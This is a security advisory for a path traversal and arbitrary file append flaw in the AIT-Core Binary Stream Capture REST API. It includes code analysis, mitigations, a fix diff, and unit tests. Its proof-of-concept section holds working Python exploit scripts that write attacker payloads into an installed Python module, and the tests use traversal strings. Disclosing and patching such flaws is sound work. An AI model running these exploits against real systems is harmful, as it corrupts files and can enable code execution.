VYPR
Critical severity 9.1 · NVD Advisory · Published Jun 5, 2026 · Updated Jun 5, 2026

NASA AMMOS Instrument Toolkit: Path traversal resulting in arbitrary file append (can be triggered over the network by unauthenticated attacker)

CVE-2026-47731

Description

1. Summary

The Binary Stream Capture (BSC) component exposes an unauthenticated HTTP API for dynamically creating packet capture “handlers.” Because the code blindly trusts path‑related form fields, a remote client can:

  • Bypass the configured log root and direct BSC to log to arbitrary filesystem paths (path traversal / directory escape), and
  • Append attacker‑controlled data to those files, using the privileges of the ait-bsc process.

There are two ways for a remote attacker to trigger this:

  1. If the attacker has access to the network where ait-bsc is deployed (for example, because the ports are publicly accessible), the payloads can be sent directly to the server to trigger the arbitrary file append. This type of attack is demonstrated in python_poc.py.
  2. Even if the attacker has no direct access to the network because the software runs in a local network, the issue is exploitable if someone in that network opens an attacker-controlled website (either a website created by the attacker or a third-party website the attacker has compromised). JavaScript in the browser can automatically send the requests needed to exploit this into the local network. This works even if the server is only accessible on localhost. This type of attack is demonstrated by attacker_tcp.py and test1.html (first launch the attacker TCP server, then start a web server to host test1.html, for example using python3 -m http.server 7000, and open test1.html).

Impact

This issue affects BSC (Binary Stream Capture) and any use of the ait-bsc server. It impacts AIT-Core versions before 3.1.1, and 2.x versions before 2.6.1. Users should upgrade to version 3.1.1 or 2.6.1.

Details

A remote attacker can use this vulnerability to append data to arbitrary files on the system, provided the ait-bsc process has permission to write to them. This makes it easy to corrupt data on the system, including the AIT-Core Python code itself, in which case the server crashes after a restart when Python attempts to execute the corrupted code.

There also appears to be a bug in the TCP handler that causes a large amount of data to be written in an infinite loop after the connection has been closed, which could result in excessive disk usage.

Because the attacker can modify executable files such as Python or Bash scripts, this vulnerability could also lead to remote code execution as soon as a user runs the modified code. However, depending on the system, this attack may be difficult or even impossible to carry out in practice, because ait-bsc prepends a header to the attacker-controlled data.

Fix

Information

The vulnerability is mitigated by constraining BSC to write only to paths inside the project root log directory, which is configured through bsc.yaml. Additionally, any attempt to traverse outside the configured location is rejected.

Patches

  • 3.1.1
  • 2.6.1

---

2. Affected Code Paths

2.1 REST entry point: /NAME/start

StreamCaptureManagerServer exposes an unauthenticated POST endpoint:

# ait/core/bsc.py

class StreamCaptureManagerServer(Bottle):
    def _route(self):
        self._app.route("/", method="GET", callback=self._get_logger_list)
        self._app.route("/stats", method="GET", callback=self._fetch_handler_stats)
        self._app.route(
            "/<name>/start", method="POST", callback=self._add_logger_by_name
        )
        self._app.route(
            "/<name>/stop", method="DELETE", callback=self._stop_logger_by_name
        )
        ...

Handler:

```python
def _add_logger_by_name(self, name):
    ...
    data = dict(request.forms)
    loc = data.pop("loc", "")
    port = data.pop("port", None)
    conn_type = data.pop("conn_type", None)

    if not port or not conn_type:
        raise ValueError("Port and/or conn_type not set")
    address = [loc, int(port)]

    if "rotate_log" in data:
        data["rotate_log"] = True if data == "true" else False

    if "rotate_log_delta" in data:
        data["rotate_log_delta"] = int(data["rotate_log_delta"])

    self._logger_manager.add_logger(name, address, conn_type, **data)
```

All form fields except loc, port, conn_type are passed directly as **data into add_logger. This includes attacker‑controlled path, file_name_pattern, and potentially log_dir_path. There is no authentication on this route.

2.2 Manager: unvalidated path and log_dir_path

StreamCaptureManager.add_logger:

```python
# ait/core/bsc.py

def add_logger(self, name, address, conn_type, log_dir_path=None, **kwargs):
    capture_handler_conf = kwargs

    if not log_dir_path:
        log_dir_path = self._mngr_conf["root_log_directory"]

    log_dir_path = os.path.normpath(os.path.expanduser(log_dir_path))

    capture_handler_conf["log_dir"] = log_dir_path
    capture_handler_conf["name"] = name
    if "rotate_log" not in capture_handler_conf:
        capture_handler_conf["rotate_log"] = True
    ...
    address_key = str(address)
    if address_key in self._stream_capturers:
        capturer = self._stream_capturers[address_key][0]
        capturer.add_handler(capture_handler_conf)
        return

    socket_logger = SocketStreamCapturer(capture_handler_conf, address, conn_type)
    greenlet = gevent.spawn(socket_logger.socket_monitor_loop)

    self._stream_capturers[address_key] = (socket_logger, greenlet)
    self._pool.add(greenlet)
```

Key points:

  • If the REST client supplies log_dir_path explicitly (as a named parameter), it overrides the manager’s root_log_directory.
  • All other attacker‑supplied fields in kwargs become part of the handler configuration dict (capture_handler_conf), including path and file_name_pattern.
  • There is no check that log_dir_path or path are relative or confined.
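
The first key point follows from ordinary Python keyword binding and can be reproduced in isolation. The sketch below uses a hypothetical stand-in, `add_logger_sketch`, that mirrors only the signature shown above; the root value and the form fields are illustrative assumptions, not taken from AIT-Core.

```python
def add_logger_sketch(name, address, conn_type, log_dir_path=None, **kwargs):
    """Hypothetical stand-in that mirrors only the signature of add_logger."""
    configured_root = "/configured/root"  # assumed value of root_log_directory
    if not log_dir_path:
        log_dir_path = configured_root
    conf = dict(kwargs)
    conf["log_dir"] = log_dir_path
    conf["name"] = name
    return conf


# Form fields as they might arrive from a REST client (illustrative values).
form = {
    "log_dir_path": "/somewhere/else",
    "path": "sub",
    "file_name_pattern": "x.pcap",
}

# Unpacking the dict binds "log_dir_path" to the named parameter,
# while the remaining keys land in **kwargs.
conf = add_logger_sketch("demo", ["", 9999], "udp", **form)
print(conf["log_dir"])
print(sorted(conf))
```

Because the dict is unpacked with `**`, a client does not need any special syntax to reach the named parameter; supplying a form field with the matching name is enough.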

2.3 Path traversal via _get_log_file

SocketStreamCapturer._get_log_file builds the actual log path:

# ait/core/bsc.py

def _get_log_file(self, handler):
    """Generate log file path for a given handler"""
    if "file_name_pattern" not in handler:
        filename = "%Y-%m-%d-%H-%M-%S-{name}.pcap"
    else:
        filename = handler["file_name_pattern"]

    log_file = handler["log_dir"]
    if "path" in handler:
        log_file = os.path.join(log_file, handler["path"], filename)
    else:
        log_file = os.path.join(log_file, filename)

    log_file = time.strftime(log_file, time.gmtime())
    log_file = log_file.format(**handler)

    return log_file

On POSIX systems:

  • If handler["path"] is absolute (e.g. /home/user/...), os.path.join(base, abs_component, ...) discards the base component:
  os.path.join("/configured/root", "/home/elias/ait-venv/...", "dmc.py")
  # -> "/home/elias/ait-venv/.../dmc.py"
  
  • If handler["path"] contains .., the result can point outside the nominal root even if path is relative.
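
Both behaviours can be checked with the standard library alone. The sketch below uses `posixpath` so that it behaves the same on any platform; the directory and file names are illustrative assumptions.

```python
import posixpath

root = "/configured/root"

# An absolute component discards everything that came before it.
absolute = posixpath.join(root, "/etc", "target.txt")

# A relative component containing ".." survives the join unchanged;
# normalising it (or letting the OS resolve it at open time) lands outside root.
relative = posixpath.normpath(posixpath.join(root, "../../etc", "target.txt"))

print(absolute)
print(relative)
```

Neither result starts with `/configured/root`, which is why a check on the final, resolved path is needed rather than a check on the individual components.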

There is:

  • No os.path.realpath canonicalization *after* join, and
  • No enforcement that the final log_file begins with the configured root prefix.

Combined with StreamCaptureManager.add_logger, this means:

  • The attacker controls both:
    • handler["log_dir"] (via log_dir_path), and
    • handler["path"] and handler["file_name_pattern"].

They can therefore direct BSC’s log output to any path that the OS permissions allow, not just under root_log_directory.

2.4 File opened for append without safety checks

# ait/core/bsc.py

def _get_logger(self, handler):
    """Initialize a PCAP stream for logging data"""
    log_file = self._get_log_file(handler)

    if not os.path.isdir(os.path.dirname(log_file)):
        os.makedirs(os.path.dirname(log_file))

    handler["log_rot_time"] = time.gmtime()
    return pcap.open(log_file, mode="a")

pcap.open:

# ait/core/pcap.py

def open(filename, mode="r", **options):
    ...
    mode = mode.replace("b", "") + "b"  # "a" -> "ab"
    ...
    stream = PCapStream(builtins.open(filename, mode), mode)
    return stream

Consequences:

  • If the target directory does not exist, os.makedirs(os.path.dirname(log_file)) will create it, even if it is outside the intended root.
  • The file is opened in append‑binary mode ("ab"):
    • The OS will create it if missing.
    • Existing content is preserved; new data is appended.
  • There is no:
    • realpath‑based confinement,
    • symlink protection, or
    • additional access control beyond standard filesystem permissions.
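
The create-then-append behaviour described above is plain standard-library behaviour. A minimal sketch, run entirely inside a temporary directory (the file and directory names are illustrative assumptions):

```python
import os
import tempfile

with tempfile.TemporaryDirectory() as base:
    # A nested location whose parent directories do not exist yet.
    target = os.path.join(base, "not", "yet", "there", "victim.txt")

    # Same pattern as _get_logger: create missing parents, then open for append.
    if not os.path.isdir(os.path.dirname(target)):
        os.makedirs(os.path.dirname(target))

    with open(target, "ab") as fh:  # first open creates the file
        fh.write(b"original\n")
    with open(target, "ab") as fh:  # second open keeps the existing bytes
        fh.write(b"appended\n")

    with open(target, "rb") as fh:
        contents = fh.read()

print(contents)
```

Nothing in this sequence asks whether the target belongs under a particular root, so any confinement has to be enforced before the path reaches `os.makedirs` and `open`.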

2.5 Part of the written data is attacker‑controlled network payload

Captured data path:

# ait/core/bsc.py

def capture_packet(self):
    """Write packet data to the logger's log file."""
    data = self.socket.recv(self._buffer_size)

    for h in self.capture_handlers:
        h["reads"] += 1
        h["data_read"] += len(data)

        d = data
        if "pre_write_transforms" in h:
            for data_transform in h["pre_write_transforms"]:
                d = data_transform(d)
        h["logger"].write(d)

SocketStreamCapturer.__init__:

  • UDP:
  if conn_type == "udp":
      self.socket = gevent.socket.socket(AF_INET, SOCK_DGRAM)
      self.socket.bind((address[0], address[1]))
  
  • TCP:
  elif conn_type == "tcp":
      self.socket = gevent.socket.socket(AF_INET, SOCK_STREAM)
      self.socket.connect((address[0], address[1]))
  

Thus:

  • For UDP, any host that can send datagrams to the configured (IP,port) directly controls data.
  • For TCP, the remote server at (loc, port) directly controls data.

PCapStream.write wraps this data in a PCAP packet header and writes it to the file, but does not sanitize or transform the payload bytes beyond optional in‑process transforms.
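
To illustrate what "wraps this data in a PCAP packet header" means for the bytes that reach the file, the sketch below builds one record by hand. It assumes the classic libpcap per-packet layout (four unsigned 32-bit fields: ts_sec, ts_usec, incl_len, orig_len) in little-endian byte order; AIT's own header class may differ in detail, and `pcap_record` is a hypothetical helper.

```python
import struct


def pcap_record(payload, ts_sec, ts_usec=0):
    """Build one record: a 16-byte header followed by the raw payload.

    Assumes the classic libpcap record layout in little-endian byte order.
    """
    header = struct.pack("<IIII", ts_sec, ts_usec, len(payload), len(payload))
    return header + payload


payload = b"ATTACK_PAYLOAD"

# A timestamp whose low byte is zero, so the first byte written is 0x00.
record = pcap_record(payload, ts_sec=0x6A000100)

print(len(record) - len(payload))  # number of header bytes in front of the payload
print(record[:4].hex())            # ts_sec as it appears in the file
print(record[16:] == payload)      # payload bytes are written unchanged
```

Under this assumption the payload itself is untouched, but it is always preceded by header bytes the attacker controls only partially, for example through the time at which the packet is sent.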

---

3. Recommendations

The core objective is to ensure that untrusted REST input cannot steer log file paths outside a trusted directory tree.

3.1 Constrain log paths to a trusted root

  • In StreamCaptureManager.add_logger and/or SocketStreamCapturer._get_log_file:
  1. Compute a canonical root:
     root = os.path.realpath(self._mngr_conf["root_log_directory"])
     
  2. When applying path and file_name_pattern, always join relative to this root; do not accept an absolute path from REST:
     user_path = handler.get("path", "")
     # force relative
     user_path = user_path.lstrip(os.sep)
     candidate = os.path.realpath(os.path.join(root, user_path, filename))
     
  3. Enforce the prefix:
     if not (candidate == root or candidate.startswith(root + os.sep)):
         raise ValueError("Invalid log path; must remain under root_log_directory")
     
  • Reject any REST‑supplied log_dir_path that is absolute or attempts to escape the configured root, or disallow log_dir_path entirely in REST calls.
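
The steps in 3.1 can be combined into one helper. The sketch below is a variant rather than the project's code: it uses `os.path.commonpath` for the containment test instead of the string-prefix comparison, and `confine_to_root` is a hypothetical name.

```python
import os
import tempfile


def confine_to_root(root, user_path, filename):
    """Return the canonical log path, or raise ValueError if it leaves root."""
    root_real = os.path.realpath(root)
    # Strip leading separators so an absolute user_path cannot reset the join.
    candidate = os.path.realpath(
        os.path.join(root_real, user_path.lstrip(os.sep), filename)
    )
    # commonpath compares whole path components, so "/root-other" is not
    # mistaken for a child of "/root".
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError("Invalid log path; must remain under root_log_directory")
    return candidate


with tempfile.TemporaryDirectory() as root:
    root_real = os.path.realpath(root)
    inside = confine_to_root(root, "captures", "a.pcap")
    stripped = confine_to_root(root, "/etc", "a.pcap")  # forced relative
    try:
        confine_to_root(root, "../..", "a.pcap")
        escaped = True
    except ValueError:
        escaped = False

print(inside.startswith(root_real + os.sep), escaped)
```

If file_name_pattern can contain substitutions, the check belongs after those substitutions have been applied, so that the validated string is the one actually opened.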

3.2 Treat REST input as untrusted

  • Only allow path / file_name_pattern override from the configuration file (bsc.yaml), not from REST.
  • For REST‑created handlers, either:
    • Use a fixed subdirectory under the configured root, or
    • Validate path strictly as a simple relative name with no / or .. components.
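
One way to express the strict validation is an allowlist on the characters of a single path component. This is a sketch under assumptions: the permitted character set and the helper name `is_simple_relative_name` are illustrative choices, not part of AIT-Core.

```python
import re

# Letters, digits, underscore, dot, and hyphen only (an assumed allowlist).
_SIMPLE_NAME = re.compile(r"[A-Za-z0-9_.-]+")


def is_simple_relative_name(value):
    """True if value is one path component with no separator and no '..'."""
    if not value or value == "." or ".." in value:
        return False
    return _SIMPLE_NAME.fullmatch(value) is not None


for candidate in ["captures", "run-01.logs", "a/b", "..", "../etc", "/etc"]:
    print(candidate, is_simple_relative_name(candidate))
```

An allowlist is stricter than stripping or rejecting specific sequences, which makes it easier to reason about but also rejects some harmless names.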

3.3 Note on /tmp usage

  • While not the root cause of this vulnerability, using a world‑writable directory such as /tmp as a log root in a multi‑user system is generally unsafe (standard symlink and race issues).
  • It is recommended to:
    • Use a dedicated, non‑world‑writable directory for BSC logs (e.g. /var/opt/ait-bsc/logs).
    • Update the documentation examples to reflect this and add a warning against /tmp for production use.

3.4 Harden open calls

  • If symlink attacks are a concern in specific deployments, consider not following symlinks when writing to log files.
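
On POSIX systems, one possible approach is to open the log file with `O_NOFOLLOW`. The sketch below is an assumption about how this could be done, not the project's implementation; `open_append_nofollow` is a hypothetical helper, and the flag only protects the final path component, not symlinks in parent directories.

```python
import os
import tempfile


def open_append_nofollow(path):
    """Open path for binary append, refusing a symlink as the final component."""
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o640)
    return os.fdopen(fd, "ab")


with tempfile.TemporaryDirectory() as base:
    real = os.path.join(base, "real.log")
    link = os.path.join(base, "link.log")

    with open_append_nofollow(real) as fh:  # regular file: allowed
        fh.write(b"x")

    os.symlink(real, link)
    try:
        open_append_nofollow(link)  # symlink: the open fails with OSError
        refused = False
    except OSError:
        refused = True

    with open(real, "rb") as fh:
        real_contents = fh.read()

print(refused)
```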

3.5 REST API exposure

  • Because /NAME/start directly controls file paths and network connections:
    • It should not be exposed to untrusted networks.
    • Consider adding optional HTTP authentication or limiting binding to a protected interface or Unix domain socket.
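
As one illustration of optional authentication, a shared token could be checked on each request before a handler is created. The sketch below is framework-independent and entirely hypothetical: the bearer scheme, the token value, and the `is_authorized` helper are assumptions, not an existing AIT-Core feature.

```python
import hmac


def is_authorized(authorization_header, expected_token):
    """Check a 'Bearer <token>' header value using a constant-time comparison."""
    prefix = "Bearer "
    if not authorization_header or not authorization_header.startswith(prefix):
        return False
    supplied = authorization_header[len(prefix):]
    return hmac.compare_digest(supplied.encode(), expected_token.encode())


token = "example-token"  # illustrative; a real token would come from configuration
print(is_authorized("Bearer example-token", token))
print(is_authorized("Bearer wrong", token))
print(is_authorized(None, token))
```

A check like this complements, and does not replace, the path confinement described in 3.1.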

4. Proof of concept files

4.1 python_poc.py

```python
#!/usr/bin/env python3
"""
AIT-Core BSC path traversal & arbitrary file append PoC (UDP, timed header).

Assumptions:
  - ait-core and requests are installed.
  - ait-bsc is running on 127.0.0.1:8080 with a bsc.yaml including:

        capture_manager:
            root_log_directory: /tmp
            manager_server:
                host: localhost
                port: 8080
        handlers: []

What this script does:
  1) Uses the BSC REST API to create a conn_type=udp handler that:
       - binds a UDP socket on UDP_PORT, and
       - logs to TARGET_PATH, which is OUTSIDE /tmp via 'path'.
  2) Waits until the current UNIX time satisfies (ts_sec & 0xFF) == 0
     (low byte of ts_sec == 0) and sends a UDP PAYLOAD right then.
     On little-endian, this makes the FIRST BYTE of the PCAP packet header
     (ts_sec low byte) 0x00 with high probability.
  3) Shows that TARGET_PATH (outside /tmp) exists and contains the payload.
  4) DELETEs the handler so you can rerun the script without restarting ait-bsc.

Note:
  - The script does NOT delete or truncate TARGET_PATH.
  - If TARGET_PATH already exists, ait-bsc will append a new PCAP packet
    (header + payload) at the end of the file.
"""

import os
import socket
import time

import requests

# BSC REST API base URL
BSC_BASE_URL = "http://127.0.0.1:8080"

# UDP capture parameters
UDP_PORT = 9999
HANDLER_NAME = "traversal-udp-poc-timed"
CONN_TYPE = "udp"

# Target directory and file OUTSIDE /tmp
HOME = os.path.expanduser("~")
TARGET_DIR = "/home/elias/ait-venv/lib/python3.10/site-packages/ait/core/"
TARGET_FILE = "dmc.py"
TARGET_PATH = os.path.join(TARGET_DIR, TARGET_FILE)

# Payload to be sent in the UDP datagram
PAYLOAD = b"ATTACK_PAYLOAD_UDP_TIMED_12345"


def wait_for_first_header_byte_zero():
    """
    Wait until the low byte of the current UNIX seconds is 0.

    PCapPacketHeader.pack() writes ts_sec first, and on little-endian systems
    the first byte in the file is ts_sec & 0xFF. We wait for ts_sec % 256 == 0
    and for the fractional part of the second to be small.
    """
    print("[*] Waiting for ts_sec & 0xFF == 0 (may take up to ~4m16s)...")
    while True:
        now = time.time()
        ts_sec = int(now)
        # Condition: low byte zero and we are in the first 200ms of this second
        if (ts_sec & 0xFF) == 0 and (now - ts_sec) < 0.2:
            print(f"[+] Condition met: ts_sec={ts_sec}, low byte=0x00")
            return
        time.sleep(0.01)


def create_udp_handler():
    """
    Use BSC REST API to create a UDP handler that binds on UDP_PORT and logs
    to TARGET_PATH, which is outside /tmp via the 'path' parameter.
    """
    data = {
        "loc": "",  # bind on all interfaces
        "port": str(UDP_PORT),
        "conn_type": CONN_TYPE,
        "path": TARGET_DIR,  # ABSOLUTE path outside /tmp
        "file_name_pattern": TARGET_FILE,
    }

    url = f"{BSC_BASE_URL}/{HANDLER_NAME}/start"
    print(f"[+] Creating UDP handler via POST {url}")
    resp = requests.post(url, data=data)
    print(f"[+] Handler creation HTTP status: {resp.status_code}")
    if not (200 <= resp.status_code < 300):
        raise SystemExit(f"Handler creation failed: {resp.status_code} {resp.text!r}")


def send_udp_payload_timed():
    """
    Wait for the desired timestamp condition, then send the UDP payload to the
    handler's bound UDP port.
    """
    wait_for_first_header_byte_zero()

    print(f"[+] Sending timed UDP payload to 127.0.0.1:{UDP_PORT}")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.sendto(PAYLOAD, ("127.0.0.1", UDP_PORT))
    finally:
        sock.close()

    # Give ait-bsc a moment to recv and write
    time.sleep(0.5)


def stop_udp_handler():
    """
    Stop the handler so the script can be rerun without restarting ait-bsc.
    """
    url = f"{BSC_BASE_URL}/{HANDLER_NAME}/stop"
    try:
        resp = requests.delete(url, timeout=2)
        print(f"[+] DELETE {url} -> HTTP {resp.status_code}")
    except Exception as e:
        print(f"[!] Failed to DELETE handler: {e!r}")


def show_result():
    """
    Display hex+ASCII view of the first bytes of TARGET_PATH.
    """
    if not os.path.exists(TARGET_PATH):
        print(f"[!] Target file does not exist: {TARGET_PATH}")
        print(" ait-bsc did not create/write the file \u2014 check config and that ait-bsc is running.")
        return

    print(f"[+] Target file was created or appended by ait-bsc: {TARGET_PATH}")
    data = open(TARGET_PATH, "rb").read()
    print(f"[+] Target file size: {len(data)} bytes")

    def chunked(seq, size):
        for i in range(0, len(seq), size):
            yield i, seq[i : i + size]

    print("[+] First bytes of file (hex + ASCII):")
    for offset, chunk in chunked(data, 16):
        hex_bytes = " ".join(f"{b:02x}" for b in chunk)
        ascii_bytes = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        print(f"{offset:08x} {hex_bytes:<47} |{ascii_bytes}|")
        if offset >= 96:
            break

    if PAYLOAD in data:
        print("[+] CONFIRMED: payload bytes are present in the file.")
    else:
        print("[!] Payload bytes not found (something went wrong).")


def main():
    print("[*] AIT-Core BSC path traversal & arbitrary file append PoC (UDP, timed header)")
    print(f"[*] BSC base URL : {BSC_BASE_URL}")
    print(f"[*] UDP port : {UDP_PORT}")
    print(f"[*] TARGET_DIR : {TARGET_DIR}")
    print(f"[*] TARGET_FILE : {TARGET_FILE}")
    print(f"[*] FULL PATH : {TARGET_PATH}")
    print()

    # We deliberately do NOT create TARGET_DIR or TARGET_PATH here.
    # ait-bsc will create the directory and file when it opens the log path.
    create_udp_handler()
    send_udp_payload_timed()
    show_result()
    stop_udp_handler()

    print()
    print("[*] If you see your PAYLOAD bytes in TARGET_PATH (which is not under /tmp),")
    print("[*] then BSC has written outside its configured root_log_directory via REST 'path' using UDP.")
    print("[*] The script also timed the send so the first packet header byte (ts_sec low byte) is likely 0x00.")


if __name__ == "__main__":
    main()
```

4.2 attacker_tcp.py

```python
#!/usr/bin/env python3
import socket

HOST = "0.0.0.0"  # attacker host interface
PORT = 9001  # must match 'port' you send to ait-bsc

PAYLOAD = b"ATTACK_PAYLOAD_FROM_ATTACKER_12345\n"


def main():
    print(f"[*] Attacker TCP server listening on {HOST}:{PORT}")
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((HOST, PORT))
        srv.listen(1)

        print("[*] Waiting for connection from ait-bsc...")
        bsc_sock, bsc_addr = srv.accept()
        print(f"[+] Got connection from ait-bsc at {bsc_addr}")

        with bsc_sock:
            print("[+] Sending payload to ait-bsc...")
            bsc_sock.sendall(PAYLOAD)
            print("[+] Payload sent, closing connection")

    print("[*] Done.")


if __name__ == "__main__":
    main()
```

4.3 test1.html

```html
<!DOCTYPE html>
AIT-BSC Path Traversal PoC (Browser + TCP)
```

Affected products

2

Patches

2
ffbb424c4213

Validate and clean log handler path + unit tests

https://github.com/NASA-AMMOS/AIT-Core · epascua · May 19, 2026 · Fixed in 2.6.1 · via ghsa-release-walk
2 files changed · +391 -34
  • ait/core/bsc.py · +121 -7 · modified
    @@ -57,6 +57,48 @@
     ETH_PROTOCOL = ETH_P_ALL
     
     
    +def _validate_path_within_root(root, user_path, filename=""):
    +    """Validate that a path remains within the configured root directory.
    +
    +    Args:
    +        root: The configured root directory path
    +        user_path: User-supplied path component (from 'path' or 'log_dir_path')
    +        filename: Optional filename component
    +
    +    Returns:
    +        The validated canonical path
    +
    +    Raises:
    +        ValueError: If the resulting path would escape the root directory
    +    """
    +    # Canonicalize the root
    +    root = os.path.realpath(os.path.expanduser(root))
    +
    +    # Force user_path to be relative by stripping leading separators
    +    if user_path:
    +        user_path = user_path.lstrip(os.sep)
    +    else:
    +        user_path = ""
    +
    +    # Build the candidate path
    +    if filename:
    +        candidate = os.path.join(root, user_path, filename)
    +    else:
    +        candidate = os.path.join(root, user_path)
    +
    +    # Canonicalize the candidate path
    +    candidate = os.path.realpath(candidate)
    +
    +    # Ensure the candidate is within the root
    +    if not (candidate == root or candidate.startswith(root + os.sep)):
    +        raise ValueError(
    +            "Invalid log path; must remain under root_log_directory. "
    +            f"Attempted path would resolve to: {candidate}"
    +        )
    +
    +    return candidate
    +
    +
     class SocketStreamCapturer(object):
         """Class for logging socket data to a PCAP file."""
     
    @@ -430,15 +472,31 @@ def _get_log_file(self, handler):
             else:
                 filename = handler["file_name_pattern"]
     
    -        log_file = handler["log_dir"]
    +        # Use the stored root for validation
    +        root = handler.get("_validated_log_dir_root", handler["log_dir"])
    +
    +        # Sanitize and validate the path component
             if "path" in handler:
    -            log_file = os.path.join(log_file, handler["path"], filename)
    +            user_path = handler["path"].lstrip(os.sep)
    +            log_file = os.path.join(handler["log_dir"], user_path, filename)
             else:
    -            log_file = os.path.join(log_file, filename)
    +            log_file = os.path.join(handler["log_dir"], filename)
     
    +        # Apply time and format string substitutions
             log_file = time.strftime(log_file, time.gmtime())
             log_file = log_file.format(**handler)
     
    +        # Validate the final path stays within root
    +        log_file_real = os.path.realpath(log_file)
    +        root_real = os.path.realpath(root)
    +        if not (
    +            log_file_real == root_real or log_file_real.startswith(root_real + os.sep)
    +        ):
    +            raise ValueError(
    +                "Invalid log file path; must remain under root_log_directory. "
    +                f"Attempted path: {log_file}"
    +            )
    +
             return log_file
     
         def _get_logger(self, handler):
    @@ -526,12 +584,50 @@ def add_logger(self, name, address, conn_type, log_dir_path=None, **kwargs):
             """
             capture_handler_conf = kwargs
     
    -        if not log_dir_path:
    -            log_dir_path = self._mngr_conf["root_log_directory"]
    +        # Get the configured root directory (if available and if it's a dict)
    +        root = None
    +        if self._mngr_conf and isinstance(self._mngr_conf, dict):
    +            root = self._mngr_conf.get("root_log_directory")
     
    -        log_dir_path = os.path.normpath(os.path.expanduser(log_dir_path))
    +        if not log_dir_path:
    +            log_dir_path = root if root else "/tmp"
    +            log_dir_path = os.path.normpath(os.path.expanduser(log_dir_path))
    +        else:
    +            log_dir_path = os.path.expanduser(log_dir_path)
    +            # Only validate if we have a configured root AND log_dir_path is different from root
    +            if root and os.path.normpath(log_dir_path) != os.path.normpath(root):
    +                # If it's a relative path, join with root; if absolute, validate it
    +                if not os.path.isabs(log_dir_path):
    +                    log_dir_path = os.path.join(root, log_dir_path)
    +
    +                # Normalize and validate
    +                log_dir_path = os.path.normpath(log_dir_path)
    +                log_dir_path_real = os.path.realpath(log_dir_path)
    +                root_real = os.path.realpath(os.path.expanduser(root))
    +
    +                if not (
    +                    log_dir_path_real == root_real
    +                    or log_dir_path_real.startswith(root_real + os.sep)
    +                ):
    +                    raise ValueError(
    +                        "Invalid log_dir_path; must remain under root_log_directory. "
    +                        f"Configured root: {root_real}, Requested path: {log_dir_path_real}"
    +                    )
    +            else:
    +                # No root configured, or path equals root - just normalize the path
    +                log_dir_path = os.path.normpath(log_dir_path)
     
             capture_handler_conf["log_dir"] = log_dir_path
    +        # Store the original validated root for path validation in _get_log_file
    +        if root:
    +            capture_handler_conf["_validated_log_dir_root"] = os.path.realpath(
    +                os.path.expanduser(root)
    +            )
    +        else:
    +            # No root configured, use log_dir as the root
    +            capture_handler_conf["_validated_log_dir_root"] = os.path.realpath(
    +                log_dir_path
    +            )
             capture_handler_conf["name"] = name
             if "rotate_log" not in capture_handler_conf:
                 capture_handler_conf["rotate_log"] = True
    @@ -751,13 +847,31 @@ def _add_logger_by_name(self, name):
     
             Raises:
                 ValueError:
    -                if the port or connection type are not supplied.
    +                if the port or connection type are not supplied, or if
    +                log_dir_path is provided (not allowed via REST API).
             """
             data = dict(request.forms)
             loc = data.pop("loc", "")
             port = data.pop("port", None)
             conn_type = data.pop("conn_type", None)
     
    +        # Do not allow log_dir_path override from unauthenticated REST API
    +        # to prevent path traversal attacks. log_dir_path can only be set via
    +        # configuration file.
    +        if "log_dir_path" in data:
    +            raise ValueError(
    +                "log_dir_path parameter is not allowed via REST API. "
    +                "Configure log directories in the bsc.yaml configuration file instead."
    +            )
    +
    +        # Validate path parameter to prevent directory traversal
    +        if "path" in data:
    +            # Remove any leading slashes to force relative paths
    +            data["path"] = data["path"].lstrip(os.sep)
    +            # Reject paths with parent directory references
    +            if ".." in data["path"]:
    +                raise ValueError("path parameter cannot contain '..'")
    +
             if not port or not conn_type:
                 e = "Port and/or conn_type not set"
                 raise ValueError(e)
    
  • tests/ait/core/test_bsc.py · +270 -27 · modified
    @@ -350,6 +350,73 @@ def test_remove_handler(self, socket_mock, pcap_open_mock):
             assert len(sl.capture_handlers) == 1
             assert sl.capture_handlers[0]["name"] == "h1"
     
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_with_absolute_path(self, socket_mock, pcap_open_mock):
    +        """Test that absolute paths in 'path' parameter are stripped and allowed if valid"""
    +        # After stripping leading slashes, "/etc/passwd" becomes "etc/passwd" which is
    +        # a valid relative path under /tmp
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp",
    +            "path": "/etc/passwd",
    +            "_validated_log_dir_root": "/tmp",
    +        }
    +        sl = bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +        # The path should have been stripped and become relative
    +        log_file = sl._get_log_file(sl.capture_handlers[0])
    +        assert log_file.startswith("/tmp")
    +        # After stripping, it becomes "etc/passwd" which is valid
    +        assert "etc/passwd" in log_file
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_with_parent_references(self, socket_mock, pcap_open_mock):
    +        """Test that parent directory references (..) are blocked during initialization"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/logs",
    +            "path": "../../etc",
    +            "_validated_log_dir_root": "/tmp/logs",
    +        }
    +
    +        # Should raise during initialization when _get_logger is called
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_complex_escape(self, socket_mock, pcap_open_mock):
    +        """Test complex path traversal attempts are blocked during initialization"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/bsc",
    +            "path": "subdir/../../../etc",
    +            "_validated_log_dir_root": "/tmp/bsc",
    +        }
    +
    +        # Should raise during initialization when _get_logger is called
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_valid_relative_path_allowed(self, socket_mock, pcap_open_mock):
    +        """Test that valid relative paths within root are allowed"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/bsc",
    +            "path": "subdir/nested",
    +            "_validated_log_dir_root": "/tmp/bsc",
    +        }
